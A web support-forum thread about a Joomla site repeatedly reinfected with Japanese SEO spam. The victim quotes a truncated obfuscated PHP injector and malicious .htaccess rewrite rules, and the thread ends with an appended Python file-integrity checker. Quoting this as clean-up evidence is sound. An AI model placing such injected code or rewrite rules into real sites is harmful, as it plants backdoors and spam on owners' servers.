Site keeps getting infected even with SecurityCheck Pro

6 years 1 month ago #4461 by shibumi
I have a site I manage that I took over because it was hacked. I cleaned up, to my knowledge, all of the malicious code, and even moved the site to a different server. The original "malware" infection is gone, but now the root index.php keeps getting injected with code that loads a Japanese content webpage. I have made the index.php file read only (0444), and yet it is still getting injected with the malicious code and the file permissions are changed to 0644. I clean it, chmod it back to 0444, and a day or two later it is back again, with file permissions back to 0644. How do I finally get rid of this little bugger?


6 years 1 month ago #4462 by Jose
Hi Jeff,

Last week I cleaned an infection like yours; the site was infected again and again because there were many backdoors into it. If cybercrooks put a backdoor in the site they will be able to bypass the firewall; we must not forget that SCP is a Web Application Firewall (accesses to backdoors are done directly and not following the Joomla route mechanism, so there is no attack).

A few questions:

- Is the malware scanner configured to scan the entire filesystem (timeline = 10000 and deep scan enabled)?

- Is the file integrity feature alerting you of the modified file?

Regards,
Jose


6 years 1 month ago #4480 by shibumi
Hi Jose,

I tried your suggestions and ran a deep scan last night, and it did find Blackhat SEO Spam. I cleaned up the files, and once again this evening this code was injected at the top of the root index.php file:
Code:
@set_time_limit(0);
$xmlname = 'mapss.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){ $smuri_tmp='/'; }
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
    if (isset($_SERVER['REQUEST_URI'])){
        $smuri = $_SERVER['REQUEST_URI'];
    }else{
        if(isset($_SERVER['argv'])){
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
        }else{
            $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
        }
    }
    return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO .... more lines of code .... MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));

Every time it is injected, there is no Last Modified timestamp change to the file, except for when I remove the above code, save the file, and then chmod it to 0444. The only thing that is different, and that indicates the file has been injected again, is that the file permissions have changed back to 0644.

This site, when they originally contacted me for help, was infected with over 5000 malicious html files in various added to their server, which had all been removed. I would do a complete re-install of their site from scratch, but I am not sure if the client has copies of all their paid extensions/templates, as I did not do the original design, and I am not sure if the original designer is still around, since they contacted me for help.

I attached the export of the latest deep scan.

File Attachment:

File Name: malwaresca...0317.zip
File Size:6 KB

Thanks,

Jeff


6 years 1 month ago #4481 by Jose
Hi Jeff,

shibumi wrote: Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.

This is really odd; even a single character modified changes the hash value and you should be alerted...

I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.

Also remember that I clean infected websites; if you need help, ask me for a quotation. Maybe you can clean the website instead of doing a complete re-install.

Regards,
Jose


6 years 4 weeks ago #4501 by shibumi
I tried to post the other day, but it kept giving me an error, and then I could not even access your site for a while...

Webmaster wrote: Hi Jeff,

Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.


This is really odd; even a single character modified changes the hash value and you should be alerted...


The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)

Another interesting thing is that my .htaccess file is getting wiped and overwritten with the following code at 5:23am every day:
Code:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]
or this code:
Code:
RewriteEngine On
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L]
RewriteBase /
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$
RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$
RewriteRule . /index.php [L]

Webmaster wrote: I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.


I deleted the two files you mentioned; they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, when it came back...

Webmaster wrote: Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.

Regards,
Jose


6 years 4 weeks ago #4502 by Jose
Hi Jeff,

shibumi wrote: I tried to post the other day, but kept giving me an error, then could not even access your site for a while...

Yes, I did some improvements in the site. I apologize about that.

shibumi wrote: The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)

Maybe the hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.

shibumi wrote: Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday

I think this is an automated task of your hosting provider; please read this forum entry.

shibumi wrote: I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...

Either your website or the server is still infected; do you have shared hosting or a dedicated server?

Regards,
Jose
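As an added illustration of the point Jose makes above (and in post #4481), here is a small baseline-and-compare integrity check. It is example code written for this thread, not SecurityCheck Pro's scanner and not anything from the infected site. It records a SHA-256 hash, the permission bits and the mtime of each watched file, then reports three things the thread describes: content that changed while the Last Modified timestamp stayed the same (a stat-based check misses this, a hash comparison does not), a mode that flipped from 0444 to 0644, and a PHP file appearing where the baseline had none. The `demo()` scenario, the file names and the "injected" content are constructed for the example.

```python
import hashlib
import os
import stat
import tempfile

# Constructed example: a minimal baseline-and-compare integrity check.
# Not SecurityCheck Pro's code; it only shows why a hash-based check still
# fires when a file is rewritten but its old mtime is put back.

WATCHED = (".php", ".htaccess")


def snapshot_file(path):
    """Record SHA-256, permission bits and mtime (whole seconds) for one file."""
    st = os.stat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return {
        "sha256": digest.hexdigest(),
        "mode": stat.S_IMODE(st.st_mode),
        "mtime": int(st.st_mtime),
    }


def build_baseline(root):
    """Map relative path -> snapshot for every watched file under root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(WATCHED):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = snapshot_file(full)
    return baseline


def compare(baseline, root):
    """Return (relpath, finding) pairs describing how root drifted from baseline."""
    findings = []
    current = build_baseline(root)
    for rel, old in baseline.items():
        new = current.get(rel)
        if new is None:
            findings.append((rel, "deleted"))
            continue
        if new["sha256"] != old["sha256"]:
            if new["mtime"] == old["mtime"]:
                # Content changed but the timestamp was restored: a Last Modified
                # check misses this, the hash comparison does not.
                findings.append((rel, "content changed, mtime unchanged"))
            else:
                findings.append((rel, "content changed"))
        if new["mode"] != old["mode"]:
            findings.append((rel, "mode changed %04o -> %04o" % (old["mode"], new["mode"])))
    for rel in current:
        if rel not in baseline:
            # A PHP file that was not in the baseline, e.g. dropped into an images directory
            findings.append((rel, "new file"))
    return findings


def demo():
    """Constructed scenario mirroring the thread: index.php rewritten, its old mtime
    put back, mode loosened from 0444 to 0644, and a new PHP file appearing elsewhere."""
    with tempfile.TemporaryDirectory() as root:
        idx = os.path.join(root, "index.php")
        with open(idx, "w") as fh:
            fh.write("<?php\n// clean entry point\n")
        os.chmod(idx, 0o444)
        baseline = build_baseline(root)

        old_mtime = os.stat(idx).st_mtime
        os.chmod(idx, 0o644)
        with open(idx, "r+") as fh:
            body = fh.read()
            fh.seek(0)
            fh.write("<?php /* injected marker (constructed) */ ?>\n" + body)
        os.utime(idx, (old_mtime, old_mtime))  # restore the old timestamp

        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "images", "thumb.php"), "w") as fh:
            fh.write("<?php\n")

        return compare(baseline, root)


if __name__ == "__main__":
    for rel, finding in demo():
        print(rel, "-", finding)
```

Run it as-is to see the three findings for the constructed directory; to use the same idea on a real site, call `build_baseline()` on the web root right after a clean-up, keep the result somewhere the web server cannot write, and run `compare()` from cron. Files owned by the web server user that it can rewrite (and then chmod back) are exactly the ones worth keeping in the baseline.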
